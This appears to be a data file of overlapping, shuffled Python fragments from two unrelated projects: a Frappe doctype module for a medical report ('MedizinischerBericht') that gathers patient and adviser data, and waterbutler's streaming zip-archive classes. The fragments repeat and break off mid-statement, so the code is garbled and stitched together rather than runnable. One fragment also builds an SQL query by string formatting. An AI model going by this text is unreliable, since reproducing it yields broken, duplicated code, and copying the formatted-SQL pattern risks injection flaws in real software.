"= '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return data",
"= mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"]",
"# -*- coding: utf-8 -*- # Copyright (c) 2019, libracore and contributors #",
"# ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung =",
"information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import",
"for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") #",
"korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung =",
"if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") #",
"= korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data =",
"ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut =",
"0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv",
"pass # def validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: #",
"korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut",
"data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else:",
"mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] =",
"employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee)",
"2019, libracore and contributors # For license information, please see license.txt from __future__",
"if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv:",
"# korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat):",
"ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") #",
"import formatdate class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in self.ausgangslage:",
"korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {}",
"data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE",
"= korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat =",
"'' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` =",
"libracore and contributors # For license information, please see license.txt from __future__ import",
"# def validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte",
"korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat",
"# Copyright (c) 2019, libracore and contributors # For license information, please see",
"korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung",
"'' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"]",
"\"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def",
"formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name`",
"format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM",
"coding: utf-8 -*- # Copyright (c) 2019, libracore and contributors # For license",
"= ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung",
"-*- coding: utf-8 -*- # Copyright (c) 2019, libracore and contributors # For",
"mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name",
"license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data",
"\" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"]",
"= frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name +",
"= korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung",
"mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt",
"mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \"",
"= formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT",
"def validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte ="
] |
[
") # Update file info self.file.compressed_size += len(compressed) ret += compressed # buffer",
"time import zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream",
"filename, stream = file_tuple filename = filename.strip('/') # Build a ZipInfo instance to",
"descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic",
"'<4sLLL' signature = b'PK\\x07\\x08' # magic number for data descriptor return struct.pack( fmt,",
"0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset = 0 for file",
"separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/') #",
"self._buffer = bytearray() # EOF is the buffer and stream are both empty",
"| dt[2] dostime = dt[3] << 11 | dt[4] << 5 | (dt[5]",
"ret += compressed # buffer any overages if n != -1 and len(ret)",
"-1 and len(ret) > n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer",
"compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper,",
"be used separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename =",
"self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size +=",
"Update file info self.file.compressed_size += len(compressed) ret += compressed # buffer any overages",
"while (n == -1 or len(ret) < n) and not self.stream.at_eof(): chunk =",
"*args, **kwargs): super().__init__() self.files = files @property def size(self): return 0 @asyncio.coroutine def",
"[ZipLocalFile(each) for each in streams] # Append a stream for the archive's footer",
"should not be used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files",
"for a zip archive Note: This class is tightly coupled to ZipStreamReader, and",
"descriptor (footer) for a local file in a zip archive Note: This class",
"and should not be used separately \"\"\" def __init__(self, file, stream, *args, **kwargs):",
"self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive",
"byte descriptor of file CRC, file size, and compress size\"\"\" self._eof = True",
"Build a ZipInfo instance to use for the file's header and footer self.zinfo",
"import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The",
"(dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack(",
"dt[1] << 5 | dt[2] dostime = dt[3] << 11 | dt[4] <<",
"self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0,",
"| (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir =",
"self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be updated",
"from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file",
"endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single, Zip-compressed stream\"\"\"",
"file size, and compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A",
"BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor",
"buffer and stream are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return",
"1980) << 9 | dt[1] << 5 | dt[2] dostime = dt[3] <<",
"asyncio import binascii import struct import time import zipfile import zlib from waterbutler.core.streams",
"super().__init__() self.files = files @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1):",
"and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip",
"file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return",
"(footer) for a local file in a zip archive Note: This class is",
"will be updated as file is streamed self.zinfo.CRC = 0 # define a",
"thin stream wrapper, used to update a ZipLocalFile as chunks are read Note:",
"= (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2] dostime",
"= self._buffer while (n == -1 or len(ret) < n) and not self.stream.at_eof():",
"information - needed to build the footer self.original_size = 0 self.compressed_size = 0",
"struct import time import zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams",
"This class is tightly coupled to ZipStreamReader, and should not be used separately",
"= yield from (self.stream()) ret = self._buffer while (n == -1 or len(ret)",
"self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir +",
"file's data has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor)",
"# modification date/time, in MSDOS format dosdate = (dt[0] - 1980) << 9",
"size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used",
"read Note: This class is tightly coupled to ZipStreamReader, and should not be",
"be wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for each in streams]",
"n != -1 and len(ret) > n: self._buffer = ret[n:] ret = ret[:n]",
"streamed self.zinfo.CRC = 0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED,",
"count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines",
"|= 0x08 # Initial CRC: value will be updated as file is streamed",
"zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC,",
"-1 or len(ret) < n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n,",
"be updated as file is streamed self.zinfo.CRC = 0 # define a compressor",
"_read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret =",
"= 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC:",
"been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream):",
"**kwargs): self.file = file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property",
"central directory for a zip archive Note: This class is tightly coupled to",
"import time import zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import",
"header, for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self):",
"the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion",
"data has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) )",
"central directory \"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS format dosdate",
"number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property",
"= 0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes",
"self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version,",
"n=-1): file_headers = [] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset =",
"from (self.stream()) ret = self._buffer while (n == -1 or len(ret) < n)",
"<reponame>laurenrevere/waterbutler import asyncio import binascii import struct import time import zipfile import zlib",
"super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for",
"self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file",
"stream, *args, **kwargs): self.file = file self.stream = stream self._buffer = bytearray() super().__init__(*args,",
"ret = self._buffer while (n == -1 or len(ret) < n) and not",
"import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import",
"filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt",
"**kwargs): super().__init__() self.files = files @property def size(self): return 0 @asyncio.coroutine def _read(self,",
"*streams): # Each incoming stream should be wrapped in a _ZipFile instance streams",
"binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof()",
"meta information - needed to build the footer self.original_size = 0 self.compressed_size =",
"zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed to build the footer",
"directory_header(self): \"\"\"The file's header, for inclusion in the archive's central directory \"\"\" dt",
"compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed",
"self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and",
"**kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer while (n",
"zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream",
"binascii import struct import time import zipfile import zlib from waterbutler.core.streams import BaseStream",
"stream are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class",
"a ZipInfo instance to use for the file's header and footer self.zinfo =",
"StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in a zip",
"ZipInfo instance to use for the file's header and footer self.zinfo = zipfile.ZipInfo(",
"| dt[4] << 5 | (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits",
"Note: This should be access after the file's data has been streamed. \"\"\"",
"return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory",
"be used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files = files",
"should not be used separately \"\"\" def __init__(self, file): super().__init__() self.file = file",
"descriptor of file CRC, file size, and compress size\"\"\" self._eof = True return",
"return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single,",
"zip archive Note: This class is tightly coupled to ZipStreamReader, and should not",
"ret[:n] else: self._buffer = bytearray() # EOF is the buffer and stream are",
"modification date/time, in MSDOS format dosdate = (dt[0] - 1980) << 9 |",
"self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data),",
"and footer Note: This should be access after the file's data has been",
"local file in a zip archive Note: This class is tightly coupled to",
"def __init__(self, file): super().__init__() self.file = file @property def size(self): return 0 @asyncio.coroutine",
"__init__(self, file, stream, *args, **kwargs): self.file = file self.stream = stream self._buffer =",
"use for the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], )",
"return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in",
"filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved,",
"extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version,",
"zlib.DEFLATED, -15, ) # meta information - needed to build the footer self.original_size",
"n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer",
"9 | dt[1] << 5 | dt[2] dostime = dt[3] << 11 |",
"# Update file info self.file.compressed_size += len(compressed) ret += compressed # buffer any",
"a _ZipFile instance streams = [ZipLocalFile(each) for each in streams] # Append a",
"= b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count,",
"from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer)",
"self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to",
"0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be updated as file",
"\"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/') # Build",
"dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return",
"date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0",
"file's header, for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def",
"if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed) ret",
"file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed =",
"__init__(self, files, *args, **kwargs): super().__init__() self.files = files @property def size(self): return 0",
"0x08 # Initial CRC: value will be updated as file is streamed self.zinfo.CRC",
"ZipLocalFile as chunks are read Note: This class is tightly coupled to ZipStreamReader,",
"extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL'",
"for inclusion in the archive's central directory \"\"\" dt = self.zinfo.date_time # modification",
"= self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update",
"size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream =",
"len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0,",
"**kwargs): \"\"\"Create 16 byte descriptor of file CRC, file size, and compress size\"\"\"",
"chunks are read Note: This class is tightly coupled to ZipStreamReader, and should",
"self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a",
"# modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr,",
"0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams",
"bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note: This class",
"= '<4sLLL' signature = b'PK\\x07\\x08' # magic number for data descriptor return struct.pack(",
"file_tuple): filename, stream = file_tuple filename = filename.strip('/') # Build a ZipInfo instance",
"= 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's",
"class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note: This class is",
"fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of",
"coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file,",
"= file @property def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create",
"@asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC, file",
"self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial",
"be used separately \"\"\" def __init__(self, file): super().__init__() self.file = file @property def",
"0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header,",
"+ self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature",
"def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret",
"define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information",
"Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed",
"after the file's data has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size",
"11 | dt[4] << 5 | (dt[5] // 2) extra_data = self.zinfo.extra filename,",
"self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property",
"= 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be updated as",
"buffer any overages if n != -1 and len(ret) > n: self._buffer =",
"waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream):",
"struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time",
"*args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer while",
"zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 #",
"archive's central directory \"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS format",
"ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file, stream, *args,",
"<< 11 | dt[4] << 5 | (dt[5] // 2) extra_data = self.zinfo.extra",
"zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset",
"< n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) #",
"self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive",
"any overages if n != -1 and len(ret) > n: self._buffer = ret[n:]",
"zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed) ret += compressed #",
"content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion in",
"date/time, in MSDOS format dosdate = (dt[0] - 1980) << 9 | dt[1]",
"in a _ZipFile instance streams = [ZipLocalFile(each) for each in streams] # Append",
"size, and compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin",
"compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info",
"\"\"\"A thin stream wrapper, used to update a ZipLocalFile as chunks are read",
"@property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08'",
"self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count =",
"stream wrapper, used to update a ZipLocalFile as chunks are read Note: This",
"# EOF is the buffer and stream are both empty if not self._buffer",
"+ len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note:",
"separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file = file self.stream =",
"separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files = files @property def",
"Initial CRC: value will be updated as file is streamed self.zinfo.CRC = 0",
"def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor",
"self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion in the archive's central",
"is tightly coupled to ZipStreamReader, and should not be used separately \"\"\" def",
"self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self,",
"endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, )",
"yield from (self.stream()) ret = self._buffer while (n == -1 or len(ret) <",
"(dt[0] - 1980) << 9 | dt[1] << 5 | dt[2] dostime =",
"# Build a ZipInfo instance to use for the file's header and footer",
"0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers",
"\"\"\"The file's header, for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property",
"b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count,",
"0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class",
"file_headers = [] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset = cumulative_offset",
"\"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS format dosdate = (dt[0]",
"time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, )",
"def _read(self, n=-1): file_headers = [] cumulative_offset = 0 for file in self.files:",
"else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed) ret += compressed",
"self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed) ret +=",
"def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC, file size,",
"should be access after the file's data has been streamed. \"\"\" return (",
"if n != -1 and len(ret) > n: self._buffer = ret[n:] ret =",
") @property def local_header(self): \"\"\"The file's header, for inclusion just before the content",
"needed to build the footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header),",
"directory \"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS format dosdate =",
"not be used separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file =",
"StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for inclusion",
"waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for",
"ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note: This class is tightly",
"EOF is the buffer and stream are both empty if not self._buffer and",
"@property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset",
"@property def directory_header(self): \"\"\"The file's header, for inclusion in the archive's central directory",
"stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion in the",
